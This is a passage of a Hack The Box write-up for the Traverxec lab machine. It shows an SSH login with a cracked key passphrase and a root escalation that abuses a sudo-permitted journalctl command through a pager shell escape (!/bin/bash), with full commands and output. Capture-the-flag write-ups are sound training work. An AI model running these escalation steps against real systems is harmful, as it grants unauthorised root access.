root in htb/boxes/Traverxec via 🐍 v2.7.17
❯
|
Login with SSH and get user.txt
Looks good ! This enough I think, not it’s time to login with SSH with passphrase hunter.
# bash
root in htb/boxes/Traverxec via 🐍 v2.7.17
❯ ssh -v -i id_rsa david@10.10.10.165
OpenSSH_8.1p1 Debian-1, OpenSSL 1.1.1d 10 Sep 2019
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 10.10.10.165 [10.10.10.165] port 22.
debug1: Connection established.
debug1: identity file id_rsa type -1
debug1: identity file id_rsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.1p1 Debian-1
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.9p1 Debian-10+deb10u1
debug1: match: OpenSSH_7.9p1 Debian-10+deb10u1 pat OpenSSH* compat 0x04000000
debug1: Authenticating to 10.10.10.165:22 as 'david'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo
debug1: Host '10.10.10.165' is known and matches the ECDSA host key.
debug1: Found key in /root/.ssh/known_hosts:7
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: Will attempt key: id_rsa explicit
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Trying private key: id_rsa
Enter passphrase for key 'id_rsa':
debug1: Authentication succeeded (publickey).
Authenticated to 10.10.10.165 ([10.10.10.165]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Remote: /home/david/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding
debug1: Sending environment.
debug1: Sending env LANG = en_US.utf8
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Fri Apr 10 19:06:53 2020 from 10.10.15.162
david@traverxec:~$ whoami
david
david@traverxec:~$ ls
bin public_www user.txt
david@traverxec:~$ cat user.txt
7db0b[--------------------]82f3d
david@traverxec:~$
|
Privilege Escalation
JOURNALCTL
This part was tricky the user david is allowed to run with sudo command with journalctl which has privilege unto root, but when I try to run sudo -l it requesting for a password I think that was not the right thing to do. so I search about the journalctl and luckily I found it on GTFObins
It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo. so I examined first the file server-stats.head this is a HEAD file which is (another file in the bin directory) and some information about the server.
david@traverxec:~/bin$ cat server-stats.head
.----.
.---------. | == |
Webserver Statistics and Data |.-"""""-.| |----|
Collection Script || || | == |
(c) David, 2019 || || |----|
|'-.....-'| |::::|
'"")---(""' |___.|
/:::::::::::\" "
/:::=======:::\
jgs '"""""""""""""'
david@traverxec:~/bin$
|
The last line of server-stats.sh was very important. It runs sudo first, and then journalctl, which means journalctl is running with root privileges. Therefore, if we can control journalctl, we have root privileges. However, we cannot seem to change any parameters. When running anything sudo journalctl -n5 -unostromo.service other than that, a password will be required.
david@traverxec:~/bin$ cat server-stats.sh
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
david@traverxec:~/bin$
|
running the server-stats.sh
david@traverxec:~/bin$ server-stats.sh
.----.
.---------. | == |
Webserver Statistics and Data |.-"""""-.| |----|
Collection Script || || | == |
(c) David, 2019 || || |----|
|'-.....-'| |::::|
'"")---(""' |___.|
/:::::::::::\" "
/:::=======:::\
jgs '"""""""""""""'
Load: 19:52:22 up 1 min, 1 user, load average: 0.16, 0.09, 0.03
Open nhttpd sockets: 2
Files in the docroot: 117
Last 5 journal log lines:
-- Logs begin at Thurs 2020-04-09 19:50:59 EDT, end at Fri 2020-04-10 19:52:23 EDT. --
Apr 10 19:51:03 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory
Apr 10 19:51:03 traverxec nhttpd[459]: started
Apr 10 19:51:03 traverxec nhttpd[459]: max. file descriptors = 1040 (cur) / 1040 (max)
Apr 10 19:51:03 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 10 19:51:38 traverxec nhttpd[729]: /../../../../bin/sh sent a bad cgi header
david@traverxec:~/bin$
|
Get the ADMIN Shell
So this is the tricky part. I need to shrink my terminal size into small in order to execute !/bin/bash command and get the root.
first is I need to run /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service which has root privileges, it’s something like this.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
|
before we execute it I will change my terminal size into small like this.
execute !/bin/bash command and finally I get the root shell and get the root.txt
after you go back the terminal size to normal it look like this.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2020-04-10 19:50:59 EDT, end at Fri 2020-04-10 19:57:00 EDT. --
Apr 10 19:51:03 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/n
Apr 10 19:51:03 traverxec nhttpd[459]: started
Apr 10 19:51:03 traverxec nhttpd[459]: max. file descriptors = 1040 (cur) / 1040 (max)
Apr 10 19:51:03 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 10 19:51:38 traverxec nhttpd[729]: /../../../../bin/sh sent a bad cgi header
!/bin/bash
root@traverxec:/home/david/bin#
|
get the root.txt
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
nostromo_1.9.6-1.deb root.txt
root@traverxec:~# cat root.txt
9aa36[--------------------]0d906
root@traverxec:~#
|
If you liked my writeup please leave a respect on my Profile
Referrences:
nostromo 1.9.6 - Remote Code Execution
Nostromo Directory Traversal Remote Command Execution
GTFObins
.. / journalctl